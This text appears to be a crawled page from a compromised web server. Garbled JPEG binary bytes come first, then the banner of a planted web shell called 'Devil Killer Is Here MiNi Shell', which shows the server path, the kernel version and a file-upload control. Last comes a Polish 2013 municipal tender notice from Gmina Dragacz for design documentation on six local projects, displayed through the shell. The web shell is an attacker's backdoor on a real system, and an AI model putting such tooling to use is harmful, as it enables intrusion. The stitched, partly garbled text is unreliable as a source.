JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130123/31872-N-2013.html

<p class="kh_header"><b>Dragacz: Wykonanie dokumentacji projektowych dla 6 zadań inwestycyjnych w gminie Dragacz</b><br>
<b>Numer ogłoszenia: 31872 - 2013; data zamieszczenia: 23.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Dragacz , Dragacz 7A, 86-134 Dragacz, woj. kujawsko-pomorskie, tel. 52 332 49 69, faks 52 332 49 74.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dragacz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowych dla 6 zadań inwestycyjnych w gminie Dragacz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia składa się z 6 części:
Część 1: obejmująca wykonanie dokumentacji projektowej na zadanie pn.: Budowa sieci wodociągowej wraz z przyłączami w miejscowości Fletnowo,  dł. ok. 6 km wraz z przyłączami w liczbie ok. 80 szt. -uszczegółowienie przedmiotu zamówienia  opisano w zał. nr 1 do SIWZ - Opis przedmiotu zamówienia oraz założenia do projektowania.
Część 2: obejmująca wykonanie dokumentacji projektowej na zadanie pn.: Przebudowa chodnika w części ul. Szarych Szeregów w miejscowości Grupa:, dł. ok. 250 mb -  uszczegółowienie przedmiotu zamówienia  opisano w zał. nr 1 do SIWZ - Opis przedmiotu zamówienia oraz założenia do projektowania.
Część 3: obejmująca wykonanie dokumentacji projektowej na zadanie pn.: Rozbudowa budynku administracyjnego Urzędu Gminy w miejscowości Dragacz. kubatura ok. 320 m3 - uszczegółowienie przedmiotu zamówienia  opisano w zał. nr 1 do SIWZ - Opis przedmiotu zamówienia oraz założenia do projektowania.
Część 4: obejmująca wykonanie dokumentacji projektowej na zadanie pn.: Budowa remizy strażackiej w miejscowości Wielkie Stwolno, kubatura ok. 650 m3 - uszczegółowienie przedmiotu zamówienia  opisano w zał. nr 1 do SIWZ - Opis przedmiotu zamówienia oraz założenia do projektowania.
Część 5: obejmująca wykonanie dokumentacji projektowej na zadanie pn.: Budowa oświetlenia ulicznego typu parkowego w ul. Wrzosowej w miejscowości Dolna Grupa, o dł. ok. 400 mb - uszczegółowienie przedmiotu zamówienia  opisano w zał. nr 1 do SIWZ - Opis przedmiotu zamówienia oraz założenia do projektowania.
Część 6: obejmująca wykonanie dokumentacji projektowej na zadanie pn.: Budowa szatni  przy boisku  w miejscowości Wielki Lubień, powierzchnia zabudowy zespolonej ok. 500 m2 - uszczegółowienie przedmiotu zamówienia  opisano w zał. nr 1 do SIWZ - Opis przedmiotu zamówienia oraz założenia do projektowania.
Zakres zamówienia dla każdej z w/w części obejmuje:
1/ pozyskanie aktualnych map do celów opiniodawczych, projektowych oraz wypisów z rejestru gruntów, 
2/ pozyskanie wymaganych prawem decyzji: 
a)	o warunkach zabudowy lub lokalizacji  inwestycji celu publicznego, 
b) o środowiskowych uwarunkowaniach zgody na realizacje przedsięwzięcia - w przypadku konieczności jej uzyskania,
3/ wykonanie raportu oddziaływania przedsięwzięcia na środowisko - w przypadku nałożenia obowiązku  sporządzenia raportu,
4/ pozyskanie warunków od gestorów sieci włączenia do sieci kanalizacyjnej, wodociągowej i energetycznej,
5/ pozyskanie decyzji o prowadzeniu robót  na warunkach wydanych  przez zarządców dróg, w tym decyzji o umieszczeniu urządzeń w pasie drogi, w przypadku projektów na realizacje inwestycji liniowych i drogowych,
6/ pozyskanie innych decyzji, uzgodnień, warunków, ocen i opinii niezbędnych do wykonania dokumentacji projektowej, w tym decyzji pozwoleń wodno - prawnych w przypadku ich potrzeby,
7/ uzgodnienie projektu budowlanego w Zespole Uzgadniania Dokumentacji Projektowej przy Starostwie Powiatowym w Świeciu,
8/ przygotowanie wniosku o zatwierdzenie projektu budowlanego i wydanie decyzji pozwolenia na budowę lub zgłoszenia rozpoczęcia robót budowlanych, w przypadku robót budowlanych nie wymagających pozwolenia na budowę oraz ich złożenie wraz z wymaganymi załącznikami we właściwym organie architektoniczno budowlanym,
9/ wykonanie niezbędnych badań i ekspertyz, konstrukcyjnych, geologicznych i geotechnicznych w przypadku zaistnienia potrzeby ich wykonania, 
10/ wykonanie dokumentacji projektowej (projekt budowlany i wykonawczy) we wszystkich niezbędnych do wykonania inwestycji branżach oraz projektu prac geotechnicznych, projektu organizacji ruchu na czasu budowy, 
11/ sporządzenie kosztorysu inwestorskiego i przedmiarów robót (we wszystkich niezbędnych branżach) oraz w razie potrzeb zamawiającego jego aktualizacji,
12/ wykonanie specyfikacji technicznych wykonania i odbioru robót budowlanych,
13/ opracowanie wytycznych do sporządzenia planu bioz, 
14/ świadczenie nadzoru autorskiego, 
15/ współdziałanie z Zamawiającym w procesie udzielania zamówień na wykonanie robót budowlanych w przypadku konieczności udzielania odpowiedzi na zapytania oferentów dotyczące rozwiązań projektowych,
16/ udzielenie  rękojmi za wady w dokumentacji projektowej, która wygaśnie wobec Wykonawcy wraz z wygaśnięciem odpowiedzialności ostatniego wykonawcy robót budowlanych z tytułu rękojmi za wady obiektów i robót wykonanych na podstawie przedmiotowej dokumentacji projektowej.
Zamawiający zaleca, aby każdy z Wykonawców dokonał wizji lokalnej w miejscu realizacji przedmiotu zamówienia, celem sprawdzenia warunków związanych z jego wykonaniem, a także dokonania oceny dokumentów i informacji koniecznych do wyceny przedmiotu zamówienia przekazywanych przez Zamawiającego w ramach niniejszego postępowania. Ryzyko rezygnacji z oględzin i wizji lokalnej obciąża Wykonawcę składającego ofertę.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.22.00.00-6, 71.24.80.00-8, 71.32.00.00-7, 71.32.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części 1, Wykonawcy muszą potwierdzić doświadczenie w wykonaniu, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie tj.: co najmniej 1 usługi odpowiadającej swoim rodzajem (wykonanie dokumentacji projektowej na wykonanie rurociągów ciśnieniowych - sieci: wodociągowa, kanalizacyjna o długości nie mniejszej niż 5 km)  i wartością (min. 100.000 zł brutto) usługom stanowiącym przedmiot zamówienia.  Dla pozostałych części przedmiotu zamówienia opisanych w części III pkt 2 SIWZ, Zamawiający nie precyzuje szczegółowego warunku w tym zakresie, a spełnienie tego warunku oceni na podstawie złożonego przez wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia warunku na podstawie załączonych do oferty oświadczeń i dokumentów, przy zastosowaniu formuły spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy, oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 i art. 44 ustawy pzp, oświadczenie wykonawców będących osobami fizycznymi w zakresie art. 24 ust. 1 pkt 2 ustawy pzp, zaakceptowany projekt umowy dokumenty wymagane w przypadku składania ofert wspólnych (pełnomocnictwo), pisemne zobowiązane podmiotów udostępniających innym wykonawcom do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w następujących przypadkach:
a) termin wykonania umowy może ulec zmianie w przypadku wystąpienia sytuacji niemożliwych do przewidzenia w chwili zawarcia umowy, takich  jak:
- konieczności wykonania zamówień dodatkowych, uniemożliwiających wykonanie zamówienia podstawowego,
- z powodu nie przewidzianego braku płynności finansowej u Zamawiającego,
- wystąpienie różnego rodzaju klęsk żywiołowych, epidemii, operacji wojennych, strajku generalnego, 
b) w przypadku zmiany kluczowego personelu Wykonawcy, 
c) uzasadnionej konieczności zmiany osób wykonujących dokumentacje projektową,
d) w przypadku zmiany stawki podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.dragacz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dragacz, Dragacz 7A, 86-134 Dragacz, pok. nr 7, w godz. 8.00 - 15.00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2013 godzina 11:45, miejsce: Urząd Gminy Dragacz, Dragacz 7A, 86- 134 Dragacz, pok. nr 4 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie dokumentacji projektowej na zadanie pn.: Budowa sieci wodociągowej wraz z przyłączami w miejscowości Fletnowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wykonanie dokumentacji projektowej na budowę sieci wodociągowej w miejscowości Fletnowo o dł. ok. 6 km wraz z przyłączami w liczbie ok. 80 szt. Dokumentacja projektowa musi się składać co najmniej z następujących opracowań:
- projekt budowlany we wszystkich wymaganych branżach  (części: opisowa i graficzna)  w ilości 6 egz. + wersje elektroniczne na nośniku CD zapis w programie PDF,
- projekt wykonawczy we wszystkich wymaganych branżach  (części: opisowa i graficzna)   w ilości 6 egz. + wersje elektroniczne na  nośniku CD zapis w programie PDF,
- przedmiary  robót dla wszystkich wymaganych branż w ilości 6  egz. + wersje elektroniczne na nośniku CD zapis w programie PDF,
- kosztorys inwestorski z wyodrębnieniem wszystkich wymaganych branż sporządzony zgodnie z przepisami Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robot budowlanych określonych w programie funkcjonalno - użytkowym /Dz. U. z 2004r. Nr 130, poz. 1389/ w ilości 3 egz.,
- specyfikacje techniczne wykonania i odbioru robót budowlanych dla każdego rodzaju robót budowlanych w ilości 6 egz. + wersje elektroniczne na nośniku CD zapis w programie PDF,
- wytyczne do sporządzenia planu bioz. w ilości 6  egz. + wersja elektroniczne na nośniku CD zapis w programie PDF.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 300.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie dokumentacji projektowej na zadanie pn.: Przebudowa chodnika w części ul. Szarych Szeregów w miejscowości Grupa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej na przebudowę chodnika w części ulicy Szarych Szeregów w Grupie,
dł. ok. 250 mb i szer. ok. 1,5 m.  Dokumentacja projektowa musi się składać co najmniej z następujących opracowań:
- projekt budowlany we wszystkich wymaganych branżach  (części: opisowa i graficzna)  w ilości 6 egz. + wersje elektroniczne na nośniku CD zapis w programie PDF,
- projekt wykonawczy we wszystkich wymaganych branżach  (części: opisowa i graficzna)   w ilości 6 egz. + wersje elektroniczne na  nośniku CD zapis w programie PDF,
- przedmiary  robót dla wszystkich wymaganych branż w ilości 6  egz. + wersje elektroniczne na nośniku CD zapis w programie PDF,
- kosztorys inwestorski z wyodrębnieniem wszystkich wymaganych branż sporządzony zgodnie z przepisami Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robot budowlanych określonych w programie funkcjonalno - użytkowym /Dz. U. z
2004r. Nr 130, poz. 1389/ w ilości 3 egz.,
- specyfikacje techniczne wykonania i odbioru robót budowlanych dla każdego rodzaju robót budowlanych w ilości 6 egz. + wersje elektroniczne na nośniku CD zapis w programie PDF,
- wytyczne do sporządzenia planu bioz. w ilości 6  egz. + wersja elektroniczne na nośniku CD zapis w programie PDF.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.32.00.00-7, 71.32.20.00-1, 71.24.80.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie dokumentacji projektowej na zadanie pn.: Rozbudowa budynku administracyjnego Urzędu Gminy w miejscowości Dragacz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej na rozbudowę budynku administracyjnego Urzędu Gminy w miejscowości Dragacz, o
kubaturze: ok. 320 m3 i powierzchni użytkowej: ok. 100 m2. Dokumentacja projektowa musi się składać co najmniej z następujących opracowań:
- projekt budowlany we wszystkich wymaganych branżach  (części: opisowa i graficzna)  w ilości 6 egz. + wersje elektroniczne na nośniku CD zapis w programie PDF,
- projekt wykonawczy we wszystkich wymaganych branżach  (części: opisowa i graficzna)   w ilości 6 egz. + wersje elektroniczne na  nośniku CD zapis w programie PDF,
- przedmiary robót dla wszystkich wymaganych branż w ilości 6  egz. + wersje elektroniczne na nośniku CD zapis w programie PDF,
- kosztorys inwestorski z wyodrębnieniem wszystkich wymaganych branż sporządzony zgodnie z przepisami Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robot budowlanych określonych w programie funkcjonalno - użytkowym /Dz. U. z
2004r. Nr 130, poz. 1389/ w ilości 3 egz.,
- specyfikacje techniczne wykonania i odbioru robót budowlanych dla każdego rodzaju robót budowlanych  w ilości 6 egz. + wersje elektroniczne na nośniku CD zapis w programie PDF,
- wytyczne do sporządzenia planu bioz. w ilości 6  egz. + wersja elektroniczne na nośniku CD zapis w programie PDF.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.22.00.00-6, 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 240.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie dokumentacji projektowej na zadanie pn.: Budowa remizy strażackiej w miejscowości Wielkie Stwolno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej na budowę remizy strażackiej w miejscowości Wielkie Stwolno o kubaturze: ok. 640 m3 i pow. użytkowej ok. 200m2. Dokumentacja projektowa musi się składać co najmniej z następujących opracowań:
- projekt budowlany we wszystkich wymaganych branżach  (części: opisowa i graficzna)  w ilości 6 egz. + wersje elektroniczne na nośniku CD zapis w programie PDF,
- projekt wykonawczy we wszystkich wymaganych branżach  (części: opisowa i graficzna)   w ilości 6 egz. + wersje elektroniczne na  nośniku CD zapis w programie PDF,
- przedmiary robót dla wszystkich wymaganych branż w ilości 6  egz. + wersje elektroniczne na nośniku CD zapis w programie PDF,
- kosztorys inwestorski z wyodrębnieniem wszystkich wymaganych branż sporządzony zgodnie z przepisami Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robot budowlanych określonych w programie funkcjonalno - użytkowym /Dz. U. z
2004r. Nr 130, poz. 1389/ w ilości 3 egz.,
- specyfikacje techniczne wykonania i odbioru robót budowlanych dla każdego rodzaju robót budowlanych w ilości 6 egz. + wersje elektroniczne na nośniku CD zapis w programie PDF,
- wytyczne do sporządzenia planu bioz. w ilości 6  egz. + wersja elektroniczne na nośniku CD zapis w programie PDF.</p></li>
